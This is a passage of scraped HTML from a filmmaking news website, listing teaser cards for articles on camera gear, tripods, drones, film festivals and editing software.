double"> <article class="loop post-3471 post type-post status-publish format-video has-post-thumbnail hentry category-equipment category-interviews category-tuition tag-film-making-basics tag-how-to tag-interview tag-tips tag-top-story post_format-post-format-video publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/tuition/top-tips-shooting-better-video-3471/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/11/pexels-photo-212372-630x420.jpg" class="lazyload blur-up wp-post-image" alt="shooting better video" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/11/pexels-photo-212372-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/11/pexels-photo-212372-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/11/pexels-photo-212372-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2016/11/pexels-photo-212372.jpg 940w" data-image-id="5341" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/tuition/top-tips-shooting-better-video-3471/" rel="bookmark">Five tips for shooting better video</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> </div> </article> </div></section><!-- .widget --><section id="keystone-query-widget-id-14" class="palette-a listing--single s-container visible-sm hidden-xs widget widget-area-2-col keystone-query-widget"><div class="section section-style-grid-large double"> <article class="loop post-5770 post type-post status-publish format-standard has-post-thumbnail hentry category-news publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/movi-unveils-new-iphone-filming-tool-5770/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/movi_renders_5-e1513609174613-630x420.jpg" class="lazyload blur-up wp-post-image" alt="Movi Smartphone Cinema Robot" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/movi_renders_5-e1513609174613-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/movi_renders_5-e1513609174613-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/movi_renders_5-e1513609174613-300x200.jpg 300w" data-image-id="5773" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/movi-unveils-new-iphone-filming-tool-5770/" rel="bookmark">Freefly unveils Movi Smartphone Cinema Robot to help iPhone filmmakers</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>By Sereena Gill Freefly Systems has announced the Movi Smartphone Cinema Robot, a new iPhone&hellip;</p> </div> </article> <article class="loop post-5754 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-editing publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/premiumbeat-music-app-filmmakers-5754/" rel="bookmark"><img width="600" height="400" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/premimum.png" class="lazyload blur-up wp-post-image" alt="premiumbeat" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/premimum.png 600w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/premimum-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/premimum-300x200.png 300w" data-image-id="5765" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/premiumbeat-music-app-filmmakers-5754/" rel="bookmark">Royalty-free music company PremiumBeat announces new app for filmmakers</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The new PremiumBeat app lets filmmakers search and listen to royalty-free music when away from&hellip;</p> </div> </article> <div class="clear-mod-2"></div> <article class="loop post-5743 post type-post status-publish format-standard has-post-thumbnail hentry category-news publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/british-independent-film-awards-2017-5743/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/Trophies_BIFA2017-630x420.jpg" class="lazyload blur-up wp-post-image" alt="British Independent Film Awards 2017" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/Trophies_BIFA2017-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/Trophies_BIFA2017-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/Trophies_BIFA2017-300x200.jpg 300w" data-image-id="5748" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/british-independent-film-awards-2017-5743/" rel="bookmark">First-time filmmakers win big at The British Independent Film Awards 2017</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>First-time filmmakers took home awards for Best Film and Best Director in the The British Independent&hellip;</p> </div> </article> <article class="loop post-5731 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-120 tag-adobe-premiere tag-editing tag-virtual-reality publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/virtual-reality-video-plug-in-adobe-5731/" rel="bookmark"><img width="630" height="280" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/VR-Stabilizer-1-1-630x280.png" class="lazyload blur-up wp-post-image" alt="virtual reality video" data-image-id="5742" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/virtual-reality-video-plug-in-adobe-5731/" rel="bookmark">New plug-in lets you edit virtual reality video in Adobe Premiere Pro and After Effects</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>A new virtual reality video stabilisation plug-in for Adobe Premiere Pro and Adobe After Effects&hellip;</p> </div> </article> <div class="clear-mod-4"></div> <article class="loop post-5727 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-tripod review_manufacturer-manfrotto publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/manfrotto-190go-m-series-tripod-range-5727/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/manfrotto5-630x420.png" class="lazyload blur-up wp-post-image" alt="190go! M-series" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/manfrotto5-630x420.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/manfrotto5-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/manfrotto5-300x200.png 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/manfrotto5.png 1000w" data-image-id="5729" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/manfrotto-190go-m-series-tripod-range-5727/" rel="bookmark">Manfrotto announces new 190go! M-series tripod range</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Manfrotto has unveiled the new 190go! M-series tripod range, which is available in aluminium and carbon&hellip;</p> </div> </article> <article class="loop post-5719 post type-post status-publish format-standard has-post-thumbnail hentry category-news publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/vuse-camera-international-space-station-5719/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/ET_300dpi_U-icon_preview-630x420.jpeg" class="lazyload blur-up wp-post-image" alt="vuse" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/ET_300dpi_U-icon_preview-630x420.jpeg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/ET_300dpi_U-icon_preview-135x90.jpeg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/12/ET_300dpi_U-icon_preview-300x200.jpeg 300w" data-image-id="5721" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/vuse-camera-international-space-station-5719/" rel="bookmark">Vuse VR camera to capture footage from the International Space Station</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The Vuse VR camera has eight cameras to capture 360-degree video. Credit: Humaneyes Virtual reality&hellip;</p> </div> </article> <div class="clear-mod-2"></div> <article class="loop post-5704 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-film-festivals publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/sundance-film-festival-2018-5704/" rel="bookmark"><img width="630" height="418" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/1024px-Egyptian_Theatre_at_night_Sundance_Film_Festival_2007-1-e1512053859862-630x418.jpg" class="lazyload blur-up wp-post-image" alt="Sundance film festival" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/1024px-Egyptian_Theatre_at_night_Sundance_Film_Festival_2007-1-e1512053859862-630x418.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/1024px-Egyptian_Theatre_at_night_Sundance_Film_Festival_2007-1-e1512053859862-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/1024px-Egyptian_Theatre_at_night_Sundance_Film_Festival_2007-1-e1512053859862-300x199.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/1024px-Egyptian_Theatre_at_night_Sundance_Film_Festival_2007-1-e1512053859862.jpg 1024w" data-image-id="5708" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/sundance-film-festival-2018-5704/" rel="bookmark">47 first-time filmmakers selected for 2018 Sundance Film Festival</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The Egyptian Theatre, as part of the Sundance Film Festival. Photo by Barnaby Dorfman from&hellip;</p> </div> </article> <article class="loop post-5696 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-behind-the-scenes tag-film-making-basics tag-tips publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/ava-duvernay-advice-aspiring-filmmakers-5696/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Ava_DuVernay_-_13th-630x420.jpg" class="lazyload blur-up wp-post-image" alt="Ava DuVernay" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Ava_DuVernay_-_13th-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Ava_DuVernay_-_13th-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Ava_DuVernay_-_13th-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Ava_DuVernay_-_13th.jpg 1024w" data-image-id="5697" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/ava-duvernay-advice-aspiring-filmmakers-5696/" rel="bookmark">Ava DuVernay shares advice for aspiring filmmakers</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Photo of Ava DuVernay by Stephanie Moreno/Grady College of Journalism and Mass Communications for Peabody&hellip;</p> </div> </article> <div class="clear-mod-4"></div> <article class="loop post-5683 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-smartphone tag-top-story review_manufacturer-manfrotto publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/manfrotto-twistgrip-smartphone-filmmakers-5683/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/manfrotto-1-630x420.png" class="lazyload blur-up wp-post-image" alt="twistgrip" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/manfrotto-1-630x420.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/manfrotto-1-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/manfrotto-1-300x200.png 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/manfrotto-1.png 1000w" data-image-id="5690" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/manfrotto-twistgrip-smartphone-filmmakers-5683/" rel="bookmark">Manfrotto unveils new TwistGrip rig for smartphone filmmakers</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The TwistGrip System product aims to make it easier to attach all your accessories to&hellip;</p> </div> </article> <article class="loop post-5673 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-competitions tag-funding publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/filmmaking-competition-young-londoners-5673/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/download-6-e1511875654601-630x420.jpeg" class="lazyload blur-up wp-post-image" alt="" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/download-6-e1511875654601-630x420.jpeg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/download-6-e1511875654601-135x90.jpeg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/download-6-e1511875654601-300x200.jpeg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/download-6-e1511875654601.jpeg 1081w" data-image-id="5680" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/filmmaking-competition-young-londoners-5673/" rel="bookmark">New filmmaking competition launched for young Londoners</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The filmmaking competition invites young people across London to pick up their cameras and make&hellip;</p> </div> </article> <div class="clear-mod-2"></div> <article class="loop post-5667 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-adobe-premiere tag-editing review_manufacturer-adobe publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/adobe-creative-cloud-subscription-deal-5667/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/editing-1141505_960_720-630x420.jpg" class="lazyload blur-up wp-post-image" alt="Creative Cloud subscription" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/editing-1141505_960_720-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/editing-1141505_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/editing-1141505_960_720-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/editing-1141505_960_720.jpg 960w" data-image-id="5668" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/adobe-creative-cloud-subscription-deal-5667/" rel="bookmark">Videographers rejoice: Adobe just discounted its Creative Cloud subscription by 20%</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Adobe has announced a 20% off offer on its Creative Cloud subscription, reducing the all apps&hellip;</p> </div> </article> <article class="loop post-5656 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-behind-the-scenes review_manufacturer-blackmagic-design publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/blackmagic-design-george-michael-5656/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gm2-e1511453910283-630x420.jpeg" class="lazyload blur-up wp-post-image" alt="george michael" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gm2-e1511453910283-630x420.jpeg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gm2-e1511453910283-135x90.jpeg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gm2-e1511453910283-300x200.jpeg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/gm2-e1511453910283.jpeg 1524w" data-image-id="5659" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/blackmagic-design-george-michael-5656/" rel="bookmark">Over 30,000 feet of film was digitised for new George Michael documentary</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>A still from the documentary George Michael: Freedom. Image courtesy of Blackmagic Design Filmmakers used Blackmagic&hellip;</p> </div> </article> <div class="clear-mod-4"></div> <article class="loop post-5652 post type-post status-publish format-standard has-post-thumbnail hentry category-news publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/hireacamera-click-collect-service-5652/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/cc-630x420.png" class="lazyload blur-up wp-post-image" alt="hireacamera" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/cc-630x420.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/cc-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/cc-300x200.png 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/cc.png 1000w" data-image-id="5653" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/hireacamera-click-collect-service-5652/" rel="bookmark">Hireacamera launches nationwide Click and Collect service</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Credit: Hireacamera Hireacamera has launched a nationwide Click &amp; Collect service for photographers across the&hellip;</p> </div> </article> <article class="loop post-5638 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-film-making-basics publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/kickstarter-crowdfunding-drip-5638/" rel="bookmark"><img width="630" height="337" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Screen-Shot-2017-11-21-at-15.17.28-1-630x337.png" class="lazyload blur-up wp-post-image" alt="" data-image-id="5650" /></a> </div> <header class="entry-header"> <h2 class="entry-title sub-heading media-heading"> <a href="http://www.thevideomode.com/news/kickstarter-crowdfunding-drip-5638/" rel="bookmark">Kickstarter launches new crowdfunding platform Drip</a> </h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Drip is a new platform launched by Kickstarter. Credit: Kickstarter Kickstarter has launched a new&hellip;</p> </div> </article> <div class="clear-mod-2"></div> </div> </section><!-- .widget --><section id="keystone-query-widget-id-15" class="palette-a listing--single s-container visible-xs no-hr widget widget-area-2-col keystone-query-widget"><div class="section section-style-list-large double"> <article class="loop post-1380 post type-post status-publish format-video has-post-thumbnail hentry category-showcase tag-editing tag-film-making-basics post_format-post-format-video publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/showcase/philip-bloom-editing-dslr-1380/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/09/photography-2188440_960_720-e1510936786687-630x420.jpg" class="lazyload blur-up wp-post-image" alt="philip bloom" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/09/photography-2188440_960_720-e1510936786687-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/09/photography-2188440_960_720-e1510936786687-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/09/photography-2188440_960_720-e1510936786687-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2015/09/photography-2188440_960_720-e1510936786687.jpg 823w" data-image-id="5636" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/showcase/philip-bloom-editing-dslr-1380/" rel="bookmark">Filmmaker Philip Bloom discusses editing and the DSLR revolution</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>Want to shoot better footage? Edit your own work. Philip Bloom divulges how being his&hellip;</p> </div> </article> <article class="loop post-5625 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-cinema-6k tag-sony tag-top-story review_manufacturer-sony publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/sony-venice-will-full-frame-release-day-5625/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Untitled-design-6-630x420-630x420.png" class="lazyload blur-up wp-post-image" alt="" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Untitled-design-6-630x420.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Untitled-design-6-630x420-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/Untitled-design-6-630x420-300x200.png 300w" data-image-id="5627" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/sony-venice-will-full-frame-release-day-5625/" rel="bookmark">Sony VENICE will be full frame from release day</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The Sony VENICE camera, Credit: Sony  Sony has listened to feedback from filmmakers to make&hellip;</p> </div> </article> <article class="loop post-5618 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-drones review_manufacturer-dji publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/dji-white-mavic-pro-5618/" rel="bookmark"><img width="630" height="421" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/MPAW-Holiday-Theme-696x935-e1510757455239-630x421.jpg" class="lazyload blur-up wp-post-image" alt="DJI Mavic Pro" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/MPAW-Holiday-Theme-696x935-e1510757455239-630x421.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/MPAW-Holiday-Theme-696x935-e1510757455239-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/MPAW-Holiday-Theme-696x935-e1510757455239-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/MPAW-Holiday-Theme-696x935-e1510757455239.jpg 696w" data-image-id="5621" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/dji-white-mavic-pro-5618/" rel="bookmark">DJI launches limited edition white Mavic Pro</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>The DJI Mavic Pro Alpine White model has been unveiled, Credit: DJI DJI has launched a seasonal&hellip;</p> </div> </article> <article class="loop post-5613 post type-post status-publish format-video has-post-thumbnail hentry category-news tag-gopro post_format-post-format-video publication_name-video-photographer loop-even loop-0 featured-image featured-video" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/gopro-films-melted-lava-5613/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/volcano-1784658_960_720-630x420.jpg" class="lazyload blur-up wp-post-image" alt="gopro films" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/volcano-1784658_960_720-630x420.jpg 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/volcano-1784658_960_720-135x90.jpg 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/volcano-1784658_960_720-300x200.jpg 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/volcano-1784658_960_720.jpg 960w" data-image-id="5615" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a href="http://www.thevideomode.com/news/gopro-films-melted-lava-5613/" rel="bookmark">Watch: Incredible footage as GoPro films itself being melted by lava</a></h2> <ul class="entry-meta"> </ul> </header> <div class="entry-content"> <p>This incredible footage was taken as a GoPro films itself being melted by lava on&hellip;</p> </div> </article> <article class="loop post-5602 post type-post status-publish format-standard has-post-thumbnail hentry category-news tag-smartphone publication_name-video-photographer loop-even loop-0 featured-image" role="article"> <header class="entry-header"> <div class="entry-media"> <a href="http://www.thevideomode.com/news/smartphone-filmmaking-mobile-5602/" rel="bookmark"><img width="630" height="420" src="https://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/09/video_mode_logo-2-e1505298980780.jpg" data-src="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/bsbsb-630x420.png" class="lazyload blur-up wp-post-image" alt="smartphone filmmaking" data-sizes="auto" data-srcset="http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/bsbsb-630x420.png 630w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/bsbsb-135x90.png 135w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/bsbsb-300x200.png 300w, http://keyassets.timeincuk.net/inspirewp/live/wp-content/uploads/sites/33/2017/11/bsbsb.png 1000w" data-image-id="5605" /></a> </div> <h2 class="entry-title sub-heading media-heading"><a 